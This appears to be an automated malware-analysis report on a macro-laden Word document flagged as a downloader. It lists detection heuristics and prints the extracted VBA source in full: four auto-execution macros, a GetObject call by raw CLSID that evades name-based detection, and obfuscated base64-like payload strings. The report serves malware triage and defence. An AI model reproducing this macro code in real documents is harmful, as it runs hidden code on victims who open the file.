Malware Insights
The sample is an OOXML document containing multiple auto-execution VBA macros (AutoOpen, Document_Open, Auto_Open, Workbook_Open). These macros call the GetObject function with a specific CLSID ({c08afd90-f2a1-11d1-8455-00a0c91f3880}), which is a known technique for executing arbitrary code or downloading secondary payloads. The VBA code also attempts to construct the string 'hell' but does not complete the action. The presence of these auto-executing macros and the GetObject call strongly suggests a downloader or initial execution vector for further malicious activity.
Heuristics 11
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA project inside OOXML medium 7 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Private Sub helloWord() Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880") -
VBA instantiates a COM class by raw CLSID high OLE_VBA_GETOBJECT_CLSID_EVASIONVBA uses GetObject("new:{CLSID}") to instantiate a COM class by raw CLSID rather than a CreateObject ProgID — an uncommon bypass of name-based macro detection.Matched line in script
Private Sub helloWord() Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() ' Becomes launched as first on MS Word -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub Document_Open() ' Becomes launched as second, another try, on MS Word -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() ' Becomes launched as second, another try, on MS Excel -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() ' Becomes launched as first on MS Excel -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1811 bytes |
SHA-256: d8c17a92dcac6f092f21e1389a5a1190190656152b2245a42233de269fed056c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Public alreadyLaunched As Integer
Private Function favourite() As String
favourite = "SQBu 9HY9bwBr9GU9 LQBX9GU9Y gBS9GU9c QB19G U9cwB09C99LQBV9 FI9SQ9g9 Gg9d9B0 9H99cw969C 89LwBi9G k9d99u9Gw9eQ9 v9DM9awBL9 GI9Ug92 9HM9I99t9E89I9 BD9Do"
End Function
Private Function examination() As String
examination = "9X9 BV9HM9ZQBy9 HM9X9BH9EI9 TwBZ9EU 9UgBc9 EE9c9Bw9EQ 9YQB09GE9X9 BM9G89Yw Bh9Gw9X9 BU9GU9bQB w9Fw9 dwBl9GI9a9 Bv9HM9d9 9u9GU9e9B l9Ds9 UwB09GE 9cgB09C"
End Function
Private Function cat() As String
cat = "09U9B y9G89YwB l9HM9cw9g9 C09Rg9g9EM 9OgBc9FU 9cwBl9HI 9cwBc 9Ec9Qg BP9Fk 9RQBS9 Fw9QQBw9H9 9R9Bh 9HQ9Y QBc9Ew9bw Bj9GE9b9Bc9FQ 9ZQBt9H99 X9B39 GU9YgBo9"
End Function
Private Function secretary() As String
secretary = "G89cw B09C49ZQB 49GU9I 99t9EE9 I99n9C09Z Q9g9GM9 bQBk9C99OQ 9x9C49 MQ9y9DE9 Lg9x9Dc9Nw9u9DI 9M9909C99O99 w9Dg9M99 n9C99 LQB39Gk9I 9Bo9Ds9"
End Function
Private Sub helloWord()
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
Dim fjiorr
fjiorr = "h" & "e" & "l" & "l"
End Sub
Sub AutoOpen()
' Becomes launched as first on MS Word
helloWord
End Sub
Sub Document_Open()
' Becomes launched as second, another try, on MS Word
helloWord
End Sub
Sub Auto_Open()
' Becomes launched as first on MS Excel
helloWord
End Sub
Sub Workbook_Open()
' Becomes launched as second, another try, on MS Excel
helloWord
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 18944 bytes |
SHA-256: 28e42e9f63a2076eefede5de3608e3953fc13167a599c17b9b8d08e182947311 |
|||
|
Detection
ClamAV:
Doc.Downloader.Generic-6698421-0
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.